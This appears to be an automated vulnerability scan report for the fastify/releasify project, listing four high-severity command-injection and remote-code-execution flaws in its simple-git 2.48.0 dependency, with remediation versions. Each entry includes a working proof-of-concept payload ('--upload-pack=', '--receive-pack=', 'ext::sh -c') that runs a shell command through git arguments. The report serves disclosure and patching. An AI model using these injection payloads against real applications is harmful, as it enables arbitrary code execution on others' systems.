Vulnerabilities	4 via 4 paths
Dependencies	125
Source	GitHub
Commit	0de5b403

Find, fix and prevent vulnerabilities in your code.

Test and protect my applications

Severity

Critical
High
4
Medium
Low

Status

Open
4
Patched
0
Ignored
0

high severity

Command Injection

Vulnerable module: simple-git
Introduced through: simple-git@2.48.0

Detailed paths

Introduced through: releasify@fastify/releasify#0de5b403c74d71c47127b9958e7856a2da0570d5 › simple-git@2.48.0

Remediation: Upgrade to simple-git@3.3.0.

Overview

simple-git is a light weight interface for running git commands in any node.js application.

Affected versions of this package are vulnerable to Command Injection via argument injection. When calling the .fetch(remote, branch, handlerFn) function, both the remote and branch parameters are passed to the git fetch subcommand. By injecting some git options it was possible to get arbitrary command execution.

PoC

// npm i simple-git
const simpleGit = require('simple-git');
const git = simpleGit();

let callback = () => {};

git.init(); // or git init

let origin1 = 'origin';
let ref1 = "--upload-pack=touch ./HELLO1;";
git.fetch(origin1, ref1,  callback); // git [ 'fetch', 'origin', '--upload-pack=touch ./HELLO1;' ]

let origin2 = "--upload-pack=touch ./HELLO2;";
let ref2 = "foo";
git.fetch(origin2, ref2,  callback); // git [ 'fetch', '--upload-pack=touch ./HELLO2;', 'foo' ]


let origin3 = 'origin';
let ref3 = "--upload-pack=touch ./HELLO3;";
git.fetch(origin3, ref3, { '--depth': '2' }, callback); // git [ 'fetch', '--depth=2', 'origin', '--upload-pack=touch ./HELLO3;' ]

// ls -la

Remediation

Upgrade simple-git to version 3.3.0 or higher.

References

Command Injection vulnerability report

high severity

Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')

Vulnerable module: simple-git
Introduced through: simple-git@2.48.0

Detailed paths

Introduced through: releasify@fastify/releasify#0de5b403c74d71c47127b9958e7856a2da0570d5 › simple-git@2.48.0

Remediation: Upgrade to simple-git@3.5.0.

Overview

simple-git is a light weight interface for running git commands in any node.js application.

Affected versions of this package are vulnerable to Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') due to an incomplete fix of CVE-2022-24433 which only patches against the git fetch attack vector. A similar use of the --upload-pack feature of git is also supported for git clone, which the prior fix didn't cover.

PoC

const simpleGit = require('simple-git')
const git2 = simpleGit()
git2.clone('file:///tmp/zero123', '/tmp/example-new-repo', ['--upload-pack=touch /tmp/pwn']);

Remediation

Upgrade simple-git to version 3.5.0 or higher.

References

Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') vulnerability report

high severity

Remote Code Execution (RCE)

Vulnerable module: simple-git
Introduced through: simple-git@2.48.0

Detailed paths

Introduced through: releasify@fastify/releasify#0de5b403c74d71c47127b9958e7856a2da0570d5 › simple-git@2.48.0

Remediation: Upgrade to simple-git@3.15.0.

Overview

simple-git is a light weight interface for running git commands in any node.js application.

Affected versions of this package are vulnerable to Remote Code Execution (RCE) when enabling the ext transport protocol, which makes it exploitable via clone() method. This vulnerability exists due to an incomplete fix of CVE-2022-24066.

PoC

const simpleGit = require('simple-git')
const git2 = simpleGit()
git2.clone('ext::sh -c touch% /tmp/pwn% >&2', '/tmp/example-new-repo', ["-c", "protocol.ext.allow=always"]);

Remediation

Upgrade simple-git to version 3.15.0 or higher.

References

Remote Code Execution (RCE) vulnerability report

high severity

Remote Code Execution (RCE)

Vulnerable module: simple-git
Introduced through: simple-git@2.48.0

Detailed paths

Introduced through: releasify@fastify/releasify#0de5b403c74d71c47127b9958e7856a2da0570d5 › simple-git@2.48.0

Remediation: Upgrade to simple-git@3.16.0.

Overview

simple-git is a light weight interface for running git commands in any node.js application.

Affected versions of this package are vulnerable to Remote Code Execution (RCE) via the clone(), pull(), push() and listRemote() methods, due to improper input sanitization. This vulnerability exists due to an incomplete fix of CVE-2022-25912.

PoC

const simpleGit = require('simple-git');
let git = simpleGit();
git.clone('-u touch /tmp/pwn', 'file:///tmp/zero12');
git.pull('--upload-pack=touch /tmp/pwn0', 'master');
git.push('--receive-pack=touch /tmp/pwn1', 'master');
git.listRemote(['--upload-pack=touch /tmp/pwn2', 'main']);

Remediation

Upgrade simple-git to version 3.16.0 or higher.

References

Remote Code Execution (RCE) vulnerability report

Vulnerabilities

Dependencies

Source

Commit

Find, fix and prevent vulnerabilities in your code.

high severity

Command Injection

Detailed paths

Overview

PoC

Remediation

References

high severity

Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')

Detailed paths

Overview

PoC

Remediation

References

high severity

Remote Code Execution (RCE)

Detailed paths

Overview

PoC

Remediation

References

high severity

Remote Code Execution (RCE)

Detailed paths

Overview

PoC

Remediation

References